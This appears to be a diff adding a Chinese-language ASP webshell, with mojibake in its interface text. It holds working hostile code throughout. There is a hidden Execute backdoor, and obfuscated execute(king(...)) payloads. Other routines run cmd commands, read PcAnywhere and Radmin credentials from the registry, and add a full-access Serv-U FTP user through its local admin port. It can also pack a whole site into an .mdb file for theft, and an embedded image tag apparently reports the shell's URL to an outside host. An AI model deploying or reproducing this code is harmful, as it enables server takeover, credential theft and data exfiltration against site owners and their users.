+Response.Buffer =true +Server.ScriptTimeout=999999999 +BodyColor="#000000" +FontColor="#b4a9a9" +LinkColor="#ffffff" +On Error Resume Next +strBAD="If Request(""#"")<>"""" Then Session(""#"")=Request(""#"")"&VbNewLine +strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))" +Const DEfd="" +sub ShowErr() + If Err Then +j"

    " & Err.Description & "

    " +Err.Clear:Response.Flush + End If +end sub +Sub j(str) +response.write(str) +End Sub +sub RaPath(s) +RaPath=ExecuteGlobal(s) +End sub +ysjb=true +Function RePath(S) +RePath=Replace(S,"\","\\") +End Function +Function RRePath(S) +RRePath=Replace(S,"\\","\") +End Function +URL=Request.ServerVariables("URL") +ScriptPath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) +ServerIP=Request.ServerVariables("LOCAL_ADDR") +Action=Request("Action") +RootPath=Server.MapPath(".") +WWWRoot=Server.MapPath("/") +CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject" +FolderPath=Request("FolderPath") +domain=Request.ServerVariables("http_host") +u=request.servervariables("http_host")&url +FName=Request("FName") +cdx="":cxd="8":ef="" +Function ShiSanFun(ShiSanObjstr) +ShiSanObjstr = Replace(ShiSanObjstr, "", """") +For ShiSanI = 1 To Len(ShiSanObjstr) + If Mid(ShiSanObjstr, ShiSanI, 1) <> "" Then +ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr + Else +ShiSanNewStr = vbCrLf + ShiSanNewStr + End If +Next +ShiSanFun = ShiSanNewStr +End Function +set fso=server.CreateObject(CONST_FSO) +set fsoX=server.CreateObject(CONST_FSO) +str1="http://"&Request.ServerVariables("SERVER_Name")& left(Request.ServerVariables("URL"),InstrRev(Request.ServerVariables("URL"),"/")):BackUrl="

    " +j ""&mNametitle&" - "&ServerIP&"" + + +j"" +j"" +Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = " ":ObT(1,0) = "wscript.shell":ObT(1,2) = "ִ,ʾ' ִCmd ˹ִ":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS ":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS ѹ ":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = " ":ObT(5,0) = "Adodb.connection":ObT(5,2) = "ݿ ":ObT(6,0) = "Adodb.Stream":ObT(6,2) = " ϴ ":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp ļ ϴ ":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "Ʒ ļ ϴ ":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload ļ ϴ ":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail ʼ շ ":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "SMTP ":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = " " +ObT(14,0) = "ws"&"cript.shell.1": OBt(14,2) = "wshԸ":OBT(15,0) = "WS"&"CRIPT.NETWORK": OBt(15,2) = "鿴ϢʱȨ":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation FSOʱļԼִ":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation ıFSOʱļԼִ":OBT(18,0) = "Shell.Users":OBt(18,2) = "ɾnet.exe net1.exeû" +For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ":Else:IsObj=" ":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if +Function PcAnywhere4() +execute(king("`>tswqz/<>rz/<>' '=txsqc 'zodwxl'=thnz zxhfo<>rz<>rz/<>'13'=tmol 'yoe.shdtzoZ\tktivnfQeh\etzfqdnU\\qzqW fgozqeoshhQ\lktlM ssQ\lufozztU rfq lzftdxegW\:Z'=txsqc 'zbtz'=thnz 'izqh'=tdqf zxhfo<>'%10'=izrov rz<>rz/< :yoe>'%10'=izrov rz<>kz<>'1'=ktrkgw'%13'=izrov tswqz<>'zlgh'=rgiztd 'dkgyb'=tdqf dkgy<>cor/'ktzfte'=fuosq cor<`p")) +end Function +j"" +Function StreamLoadFromFile(sPath) +execute(king(" zsxltk = etrbti zbtG p + zsxltk = zsxltk zbtG 50 * p = p o - )fokzl(ftV gJ 0 = a kgX yC rfS ))0 ,o ,fokzl(roT(zfCZ = p ftiJ `1` => )0 ,o ,fokzl(roT rfQ `2` =< )0 ,o ,fokzl(roT yC yC rfS 10 = p ftiJ `Q` = )0 ,o ,fokzl(roT kB `q` = )0 ,o ,fokzl(roT yC yC rfS 00 = p ftiJ `A` = )0 ,o ,fokzl(roT kB `w` = )0 ,o ,fokzl(roT yC yC rfS 90 = p ftiJ `Z` = )0 ,o ,fokzl(roT kB `e` = )0 ,o ,fokzl(roT yC yC rfS 80 = p ftiJ `W` = )0 ,o ,fokzl(roT kB `r` = )0 ,o ,fokzl(roT yC yC rfS 70 = p ftiJ `S` = )0 ,o ,fokzl(roT kB `t` = )0 ,o ,fokzl(roT yC yC rfS 60 = p ftiJ `X`= )0 ,o ,fokzl(roT kB `y` = )0 ,o ,fokzl(roT yC )fokzl(ftV gJ 0 = o kgX 1 = zsxltk zsxltk ,a ,p ,o doW )fokzl(etrbti fgozefxXfgozefxX rfSufoizgG = dqtkzUg ztUizoK rfStlgsZ.rqtN. = tsoXdgkXrqgVdqtkzU1 = fgozolgY.)izqYl(tsoXdgkXrqgV.fthB.8 = trgT.0 = thnJ.dqtkzUg izoK)`dqtkzU.wrgrQ`(zetpwBtzqtkZ.ktcktU = dqtkzUg ztUdqtkzUg doW")) +End Function + +sub promyself() +On Error Resume Next +set f=fso.GetFile(ScriptPath) +if f.Attributes <> 39 and session("lock")="" then +end if +set f=nothing +end sub +promyself +Function PcAnywhere(data,mode) +execute(king("trgetr=tktivnfQeY zbtG0+dxfyoZ=dxfyoZ)kzleh(kiZ + trgetr = trgetr kgX zobS ftiJ ))490>kzleh( kB )98 =< kzleh(( yC)dxfyoZ kgb )))9,o,ilqi(roT(etrbti kgb ))9,o,qzqr(roT(etrbti((=kzleh 9 htzU ktwdxf gJ 0 = o kgX60 = dxfyoZ :18 = ktwdxf ftiJ `ktlx` = trgd yC770 = dxfyoZ :98 = ktwdxf ftiJ `llqh` = trgd yC)8,qzqr(roT =DUQD")) + +End function +Function bin2hex(binstr) +For i = 1 To LenB(binstr) +hexstr = Hex(AscB(MidB(binstr, i, 1))) +If Len(hexstr)=1 Then +bin2hex=bin2hex&"0"&(LCase(hexstr)) +Else +bin2hex=bin2hex& LCase(hexstr) +End If +Next +End Function +CIF = Request("path") +If CIF <> "" Then +BinStr=StreamLoadFromFile(CIF) +j"Pcanywhere Reader ==>

    PATH:"&CIF&"
    ʺ:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user") +j"
    :"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass") +End If +Function radmin() +Set WSH= Server.CreateObject("WSCRIPT.SHELL") + +RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\" + +Parameter="Parameter" + +Port = "Port" + +j"
    ע:HASHֵRadminHash߻odӣ߰ٶ:Radmin_hash.rar

    " + +ParameterArray=WSH.REGREAD(RadminPath & Parameter ) + +j Parameter&":" + +If IsArray(ParameterArray) Then + +For i = 0 To UBound(ParameterArray) + +If Len (hex(ParameterArray(i)))=1 Then + +strObj = strObj & "0"&CStr(Hex(ParameterArray(i))) + +Else + +strObj = strObj & Hex(ParameterArray(i)) + +End If + +Next + +j strobj + +Else + +j"Error! Can't Read!" + +End If + +j"

    " + +PortArray=WSH.REGREAD(RadminPath & Port ) + +If IsArray(PortArray) Then + +j Port &":" + +j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0)))) + +Else + +j"Error! Can't Read!" + +End If +End Function +Function hextointer(strin) +Dim i, j, k, result +result = 0 +For i = 1 To Len(strin) +If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then +j = 15 +End If +If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then +j = 14 +End If +If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then +j = 13 +End If +If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then +j = 12 +End If +If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then +j = 11 +End If +If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then +j = 10 +End If +If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then +j = CInt(Mid(strin, i, 1)) +End If +For k = 1 To Len(strin) - i +j = j * 16 +Next +result = result + j +Next +hextointer = result +End Function +Function MainForm() +j"
    " +j"" +j"" +j"
    " +j"" +j"" +j"
    " +j"" +j"" +j"" +j"ȨĿ¼ProgramAllUsersʼ C:\\RECYCLERD:\RECYCLERpcAnywhereserv-uRealServerSQLconfigdataTempDocuments
    ַ" +j"" +j" " +j"
    ": +j"
    " +j"" +j"" +j"
    " +End Function + +Sub PageAddToMdb() +execute(king("`>dkgy/<¼Ŀ̱λ :ע>kw<>kw<>''=txsqc zodwxl=thnz zxhfo<>zeQtiz=tdqf wrTdgkXtlqtstk=txsqc ftrroi=thnz zxhfo<>13=tmol ``wrd.DUD\` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & ```=txsqc izqYtiz=tdqf zxhfo<>))``#``(fgolltU(tzxetbS=txsqc ``#``=tdqf ftrroi=thnz zxhfo<>zlgh=rgiztd dkgy<>/kw<:)֧BUX(>/ki<>dkgy/<¼Ŀͬľdqlλ,wrd.DUD :ע>kw<>kw<>'ʼ'=txsqc zodwxl=thnz zxhfo<>zetstl/<>fgozhg/hhq=txsqc fgozhg<>fgozhg/gly=txsqc fgozhg<>rgiztTtiz=tdqf zetstl<>zeQtiz=tdqf wrTgJrrq=txsqc ftrroi=thnz zxhfo<>13=tmol ``` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & ```=txsqc izqYtiz=tdqf zxhfo<>))``#``(fgolltU(tzxetbS=txsqc ``#``=tdqf ftrroi=thnz zxhfo<>zlgh=rgiztd dkgy<:м>kw<`pyC rfSrfS.tlfghltNskMaeqA&`>cor/kw<>ktzfte=fuosq cor<` p)izqYtiz(aeqYfxftiJ `wrTdgkXtlqtstk` = zeQtiz yCyC rfSrfS.tlfghltNskMaeqA&`>cor/kw<>ktzfte=fuosq cor<` p)izqYtiz(wrTgJrrqftiJ `wrTgJrrq` = zeQtiz yC111110=zxBtdoJzhokeU.ktcktU)`izqYtiz`(zltxjtN = izqYtiz)`zeQtiz`(zltxjtN = zeQtizizqYtiz ,zeQtiz doW")) +End Sub +Sub addToMdb(thePath) +On Error Resume Next +Dim rs, conn, stream, connStr, adoCatalog +Set rs = Server.CreateObject("ADODB.RecordSet") +Set stream = Server.CreateObject("ADODB.Stream") +Set conn = Server.CreateObject("ADODB.Connection") +Set adoCatalog = Server.CreateObject("ADOX.Catalog") +connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb") +adoCatalog.Create connStr +conn.Open connStr +conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)") +stream.Open +stream.Type = 1 +rs.Open "FileData", conn, 3, 3 +If Request("theMethod") = "fso" Then +fsoTreeForMdb thePath, rs, stream + Else +saTreeForMdb thePath, rs, stream +End If +rs.Close +Conn.Close +stream.Close +Set rs = Nothing +Set conn = Nothing +Set stream = Nothing +Set adoCatalog = Nothing +End Sub +Function fsoTreeForMdb(thePath, rs, stream) +execute(king("ufoizgG = ktrsgXtiz ztUufoizgG = lktrsgy ztUufoizgG = ltsoy ztUzbtGyC rfStzqrhM.lk)(rqtN.dqtkzl = )`zftzfgZtsoy`(lk)izqY.dtzo(tsoXdgkXrqgV.dqtkzl)7 ,izqY.dtzo(roT = )`izqYtiz`(lkvtGrrQ.lkftiJ 1 =< )`$` & tdqG.dtzo & `$` ,zloVtsoXlnl(kzUfC yCltsoy fC dtzo ieqS kgXzbtGdqtkzl ,lk ,izqY.dtzo wrTkgXttkJglylktrsgy fC dtzo ieqS kgXlktrsgXwxU.ktrsgXtiz = lktrsgy ztUltsoX.ktrsgXtiz = ltsoy ztU)izqYtiz(ktrsgXztE.)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU = ktrsgXtiz ztUyC rfS)`!ʷʲ߻ڴ治¼Ŀ ` & izqYtiz(kkSvgilftiJ tlsqX = )izqYtiz(lzlobSktrsgX.)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU yC`$wrs.DUD$wrd.DUD$` = zloVtsoXlnlzloVtsoXlnl ,ltsoy ,lktrsgy ,ktrsgXtiz ,dtzo doW")) +End Function +Sub unPack(thePath) +On Error Resume Next +Server.ScriptTimeOut=100000 +Dim rs, ws, str, conn, stream, connStr, theFolder +str = Server.MapPath(".") & "\" +Set rs = CreateObject("ADODB.RecordSet") +Set stream = CreateObject("ADODB.Stream") +Set conn = CreateObject("ADODB.Connection") +connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";" +conn.Open connStr +rs.Open "FileData", conn, 1, 1 +stream.Open +stream.Type = 1 +Do Until rs.Eof +theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\")) +If Server.CreateObject(CONST_FSO).FolderExists(str & theFolder) = False Then +createFolder(str & theFolder) +End If +stream.SetEos() +stream.Write rs("fileContent") +stream.SaveToFile str & rs("thePath"), 2 +rs.MoveNext +Loop +rs.Close +conn.Close +stream.Close +Set ws = Nothing +Set rs = Nothing +Set stream = Nothing +Set conn = Nothing +End Sub +Dim Filepaths +set Filepaths=new SearchFile +Filepaths.Class_Folder Filename +Sub createFolder(thePath) +Dim i +i = Instr(thePath, "\") +Do While i > 0 +If Server.CreateObject(CONST_FSO).FolderExists(Left(thePath, i)) = False Then +Server.CreateObject(CONST_FSO).CreateFolder(Left(thePath, i - 1)) +End If +If InStr(Mid(thePath, i + 1), "\") Then +i = i + Instr(Mid(thePath, i + 1), "\") + Else +i = 0 +End If +Loop +End Sub +Sub saTreeForMdb(thePath, rs, stream) +Dim item, theFolder, sysFileList +sysFileList = "$HSH.mdb$HSH.ldb$" +Set theFolder = saX.NameSpace(thePath) +For Each item In theFolder.Items +If item.IsFolder = True Then +saTreeForMdb item.Path, rs, stream + Else +If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then +rs.AddNew +rs("thePath") = Mid(item.Path, 4) +stream.LoadFromFile(item.Path) +rs("fileContent") = stream.Read() +rs.Update +End If +End If +Next +Set theFolder = Nothing +End Sub +Function ProFile() +execute(king("CU p`>tswqz/<>dkgy/<`&CU=CU`>kz/<>rz/<>'̽һ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>16=ziuoti rz<>rz/<;hlwf&>rz<>kz<`&CU=CU`>kz/<>rz/<)ȫ񣬴ԽƵԽĵĻҪ裬0ΪС( >/ ``)'',u/]r\^[/(teqshtk.txsqc=txsqc``=hxntafg ``6``=tmol ``0``=txsqc ``ziuok:fuosq-zbtz``=tsnzl ``tdoJQ``=tdqf ``zbtz``=thnz zxhfo<>rz<>rz/<Ƶ>ziuok=fuosq rz<>kz<`&CU=CU`>kz/<>rz/<)ĸԳ룬ֳʷ( 3-XJM>/ ``9``=txsqc ``kqiZQ``=tdqf ``gorqk``=thnz zxhfo< 9089AE>/ rtaetie ``0``=txsqc ``kqiZQ``=tdqf ``gorqk``=thnz zxhfo<>rz<>rz/<>ziuok=fuosq rz<>kz<`&CU=CU`>kz/<>rz/<>qtkqzbtz/<>``4``=lvgk ``14``=lsge ``trgZQ``=tdqf qtkqzbtz<>rz<>rz/<>ziuok=fuosq ``;bh8:hgz-uforrqh``=tsnzl hgz=fuosqc rz<>kz<`&CU=CU`>kz/<>rz/<>qtkqzbtz/<`&)`hlq.zltz\`&)`izqYktrsgX`(fgolltU(izqYtNN&`>``4``=lvgk ``14``=lsge ``tsoXQ``=tdqf qtkqzbtz<`&CU=CU`>rz<>rz/<>zfgy/<;hlwf&;hlwf&·ĸһÿ>kw<;hlwf&;hlwf&ĸ໤ʱͬ>vgsstn=kgsge zfgy<>kw<·ĵĻҪ>``1``=txsqc ``qccc``=tdqf ``ftrroi``=thnz zxhfo<>ziuok=fuosq 'bh99:ziuoti-tfos'=tsnzl hgz=fuosqc rz<>kz<`&CU=CU`'zlgY=9fgozeQ&tsoXgkY=fgozeQ?`&VNM&`'=fgozeq 'zlgh'=rgiztd 'dkgXhM'=tdqf dkgy<`&CU=CU`>'1'=ufoeqhlsste '1'=uforrqhsste '1'=ktrkgw tswqz<>kw<`=CUyC rfSrfS.tlfghltN`>kw<>ktzfte/<̽>q/<>afqsw_=ztukqz `&9llqh&`=tsoXgkY?`&VNM&`=ytki ``rsgw:ziuotv-zfgy;tfosktrfx:fgozqkgetr-zbtz``=tsnzl q<㣡ɳ >zfgy/<`&9llqh&`>vgsstn=kgsge zfgy< ̽>ktzfte<>kw<>kw<>kw<`p)`kqiZQ`(zltxjtk=)`kqiZ`&9llqh(fgozqeoshhQ)`tdoJQ`(zltxjtk=)`tdoJ`&9llqh(fgozqeoshhQ)`trgZQ`(zltxjtk=)`trgZ`&9llqh(fgozqeoshhQ)`tsoXQ`(zltxjtk=)`tsoX`&9llqh(fgozqeoshhQ0=)9llqh(fgozqeoshhQ)9llqh(tlqex=9llqh hggs0dxf&9llqh=9llqhyo rft 2~1' ))37+rfk*)37-46((kiZ(kzUZ=0dxftlst m~q' ))42+rfk*)42-990((kiZ(kzUZ=0dxfftiz 7=<)9llqh(ftV yo3<)9llqh(ftV tsoiK gW``=9llqh0dxf,9llqh dortmodgrfqNftiJ `zlgY`=)`9fgozeQ`(zltxjtN yC")) + +End Function +Function suftp() +j"

    8 ɰ汾Ϣ
    ϵͳ˺ţ
    ϵͳ
    ϵͳ˿ڣ
    ¼˺ţ
    ¼ӿ
    ·
    ˿ڣ
    ִȷ ȷɾ
     
    " +Usr = request.Form("duser") +pwd = request.Form("dpwd") +port = request.Form("dport") +tuser = request.Form("tuser") +tpass = request.Form("tpass") +tpath = request.Form("tpath") +tport = request.Form("tport") +'Command = request.Form("dcmd") +if request.Form("radiobutton") = "add" Then +leaves = "User " & Usr & vbcrlf +leaves = leaves & "Pass " & pwd & vbcrlf +leaves = leaves & "SITE MAINTENANCE" & vbcrlf +leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _ +"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _ +"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _ +"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _ +"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _ +"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _ +"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf +On Error Resume Next +Set xPost = CreateObject("MSXML2.XMLHTTP") +xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True +xPost.Send(leaves) +Set xPOST=nothing +j ("ɹִУFTP û: " & tuser & " " & ": " & tpass & " ·: " & tpath & " :)

    ") +else +leaves = "User " & Usr & vbcrlf +leaves = leaves & "Pass " & pwd & vbcrlf +leaves = leaves & "SITE MAINTENANCE" & vbcrlf +leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf +Set xPost3 = CreateObject("MSXML2.XMLHTTP") +xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True +xPost3.Send(leaves) +Set xPOST3=nothing +end if +End Function + +Function MainMenu() +execute(shisanfun(">elbat/<>rh/<>rt/<>dt/<>a/<½-- &dxc&>'pot_'=tegrat 'tuogoL=noitcA?'=ferh a<&xdc jfe&¸-- &dxc&>'emarFeliF'=tegrat 'psa.setadpU/bew/ten.kcahpot//:ptth'=ferh a<&xdc jfe&ѯ--ͬ &dxc&>'emarFeliF'=tegrat '&niamod&=w?xpsa.411/pi/moc.tseb411.www//:ptth'=ferh a<&xdc jfe&廤-- &dxc&>'emarFeliF'=tegrat 'eliForP=noitcA?'=ferh a<&xdc jfe&>tnof/<¼Ŀɾ>der=roloc tnof< &dxc&>'emarFeliF'=tegrat 'tniopled=noitcA?'=ferh a<&xdc jfe&>tnof/<¼Ŀ>der=roloc tnof< &dxc&>')redloFweN,&)\\..fnc_itv\&)htaPredloF(noisseS(htaPeR&(mroFlluF:tpircsavaj'=ferh a<&xdc jfe&>tnof/<Բ>der=roloc tnof< &dxc&>'emarFeliF'=tegrat 'llehsneddih=noitcA?'=ferh a<&xdc jfe&̱ &dxc&>'emarFeliF'=tegrat '&htaPtpircS&\.\\=htaPrewoP&rewoPtidE=noitcA?'=ferh a<&xdc j>rt/<&fe&__ &dxc&>'emarFeliF'=tegrat 'hcraeST=noitcA?'=ferh a<&xdc jfe&עȡ &dxc&>'emarFeliF'=tegrat 'GERdaeR=noitcA?'=ferh a<&xdc jfe&ɨڶ>wolley=roloc tnof< &dxc&>'emarFeliF'=tegrat 'troPnacS=noitcA?'=ferh a<&xdc jfe&erehwynacP &dxc&>'emarFeliF'=tegrat '4erehwynacp=noitcA?'=ferh a<&xdc jfe&ȨnimdaR &dxc&>'emarFeliF'=tegrat 'nimdar=noitcA?'=ferh a<&xdc jfe&AS-----LQS &dxc&>'emarFeliF'=tegrat 'DMM=noitcA?'=ferh a<&xdc jfe&PTF---uS &dxc&>'emarFeliF'=tegrat 'ptfus=noitcA?'=ferh a<&xdc jfe&Ȩ-uvreS &dxc&>'emarFeliF'=tegrat 'uvreS=noitcA?'=ferh a<&xdc jfe&֧__>neerg=roloc tnof< &dxc&>'emarFeliF'=tegrat 'axelA=noitcA?'=ferh a<&xdc jfe&__ڶ &dxc&>'emarFeliF'=tegrat 'ofnIlanimreTteg=noitcA?'=ferh a<&xdc jfe&__>der=roloc tnof< &dxc&>'emarFeliF'=tegrat 'esruoC=noitcA?'=ferh a<&xdc j>''=yalpsid=elyts cunem=di 0=redrob elbat<>rt/rt/<>dt/<>elbat/<&fe&-- &dxc&>'emarFeliF'=tegrat 'daolpu=noitcA?'=ferh a<&xdc jfe& &dxc&>'emarFeliF'=tegrat 'bdMoTddAegaP=noitcA?'=ferh a<&xdc jfe&̽-->dlog=roloc tnof< &dxc&>'emarFeliF'=tegrat 'php=noitcA?'=ferh a<&xdc jfe&>tnof/<¼Ŀ--д>der=roloc tnof< &dxc&>'emarFeliF'=tegrat 'mroFevirDnacSmotsuC=noitcA?'=ferh a<&xdc jfe&Ȩ--̴>etalocohc=roloc tnof< &dxc&>'emarFeliF'=tegrat 'mroFevirDnacS=noitcA?'=ferh a<&xdc jfe&2DMC--ִ &dxc&>'emarFeliF'=tegrat 'xdmc=noitcA?'=ferh a<&xdc jfe&DMC---ִ &dxc&>'emarFeliF'=tegrat 'llehS1dmC=noitcA?'=ferh a<&xdc jfe&-- &dxc&>'emarFeliF'=tegrat 'eliFpU=noitcA?'=ferh a<&xdc jfe&屾-- &dxc&>'emarFeliF'=tegrat 'eliFtidE=noitcA?'=ferh a<&xdc jfe&¼Ŀ-- &dxc&>')redloFweN,&)elifweN\&)htaPredloF(noisseS(htaPeR&(mroFlluF:tpircsavaj'=ferh a<&xdc jfe&¼Ŀϻ &dxc&>'emarFeliF'=tegrat 'kcabog=noitcA?'=ferh a<&xdc jfe&¼Ŀ̱>teloiv=roloc tnof< &dxc&>')&)htaPtooR(htaPeR&(redloFwohS:tpircsavaj'=ferh a<&xdc jfe&¼Ŀվ >tnof/<8>'sgnidgniw'=ecaf tnof<>')&)tooRWWW(htaPeR&(redloFwohS:tpircsavaj'=ferh a<> 59=htdiw d=di dt<>rt<>0=redrob elbat<>retnec=ngila pot=ngilav dt<>rt<>rt/<>dt/<>elbat/rt/<>dt/'42'=thgieh dt<>rt<&xdc jnehT =)1,0(TbO fI>rt/<>dt/<&xdc j>rt/<>dt/<>'5'=thgieh dt<>rt<&xdc j>'0'=gniddapllec '0'=gnicapsllec '%59'=htdiw elbat<&xdc j>retnec/<>tnof/<>rb<>gmi/<>'&u&?/rp/bew/moc.b2kc4h//:pt"&"th'=crs gmi<>rb<>FF9933#=roloc tnof<>retnec<>dt<>rt<&xdc j")) +end function + + +function Cmdx() +execute(king(")`>ktzfte/<>qtkqzbtz/<`(p: ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ `&)`brde`(zltxjtk(etbt.fiszhokeUg p: yo rft ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ tbt.rde`(etbt.fiszhokeUg pftiz `tbt.rde`=)`brde`(zltxjtk yo:zbtG tdxltN kgkkS fB:)` >49=lvgk 160=lsge nsfgrqtk qtkqzbtz<`(p:)` >dkgy/<>'zowdxU'=txsqc zodwxl=thnz zxhfo<`(p:)` >kw<>15=tmol 'rde'=tdqf zbtz=thnz zxhfo<`(p:)` >kw<>'tbt.rde'=txsqc 15=tmol 'brde'=tdqf zbtz=thnz zxhfo<`(p:)` >'zlgh'=rgiztd dkgy<>ktzfte<`(p")) +end function +Function Course() +execute(king("`>tswqz/<`&9CU&0CU&1CU&CU pzbtfyo rft`>kz/<>rz/<>zfgy/<`&izqh.pwg&`;hlwf&>XX2288#=kgsge zfgy<]`&bs&`:ද[>``9``=fqhlsge ``XXXXXX#``=kgsgeuw ``19``=ziuoti rz<>kz<`&tdqGnqshloW.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&9CU=9CUtlst`>kz/<>rz/<>zfgy/<`&izqh.pwg&`;hlwf&>zfgy<]`&bs&`:ද[>``9``=fqhlsge r=ro ``19``=ziuoti rz<>kz<`&tdqGnqshloW.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&0CU=0CUftiz 9=thnJzkqzU.RAB rfq `fov`><))8,7,izqh.pwg(rod(tlqZV yo`ý`=bs ftiz 7=thnJzkqzU.RAB yo``=bs ftiz 8=thnJzkqzU.RAB yo``=bs ftiz 9=thnJzkqzU.RAB yoyo rft `>kz<>kz/<>rz/<)(ͳϵ;hlwf&>r=ro rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&CU=CUftiz ``=thnJzkqzU.RAB yokqtse.kkt)`.//:JGfoK`(zetpwBztu fo pwg ieqt kgyzbtf tdxltk kgkkt fg`>kz/<>rz/<>w/<뻧ͳϵ>w<>l=ro 'ktzfte'=fuosq '8'=fqhlsge '19'=ziuoti rz<>kz<>'ktzfte'=fuosq '%13'=izrov tswqz<>kw<`=CU")) +End Function +Function IIf(var, val1, val2) +If var=True Then +IIf=val1 +Else +IIf=val2 +End If +End Function +Function GetTheSizes(num) +Dim i, arySize(4) +arySize(0)="B" +arySize(1)="KB" +arySize(2)="MB" +arySize(3)="GB" +arySize(4)="TB" +While(num / 1024 >= 1) +num=Fix(num / 1024 * 100) / 100 +i=i + 1 +WEnd +GetTheSizes=num&" "&arySize(i) +End Function +Function HtmlEncodes(str) +If IsNull(str) Then Exit Function +HtmlEncodes=Server.HTMLEncode(str) +End Function +function downfile(path) +execute(king("ufoizgf = dlg ztltlgse.dlgilxsy.tlfghltkrqtk.dlg tzokvnkqfow.tlfghltk`dqtkzl-ztzeg/fgozqeoshhq` = thnzzftzfge.tlfghltk`3-yzx` = ztlkqie.tlfghltktmol.dlg ,`izufts-zftzfge` ktrqtirrq.tlfghltk)ml,izqh(rod & `=tdqftsoy ;zftdieqzzq` ,`fgozolghlor-zftzfge` ktrqtirrq.tlfghltk0+)`\`,izqh(ctkkzlfo=mlizqh tsoydgkyrqgs.dlg0 = thnz.dlgfthg.dlg))1,5(zwg(zetpwgtzqtke = dlg ztlkqtse.tlfghltk")) +end function +function htmlencode(s) + if not isnull(s) then + s = replace(s, ">", ">") + s = replace(s, "<", "<") + s = replace(s, chr(39), "'") + s = replace(s, chr(34), """") + s = replace(s, chr(20), " ") + htmlencode = s + end if +end function +Function UpFile() + If Request("Action2")="Post" Then:Set U=new UPC :Set F=U.UA("LocalFile"):UName=U.form("ToPath"): If UName="" Or F.FileSize=0 then: SI="
    "&"ϴ"&"ȫ"&"·ѡ"&"һļ"&"ϴ!":on error resume next: Else: F.SaveAs UName: If Err.number=0 Then: SI="



    ļ"&UName&""&""&"ɹ
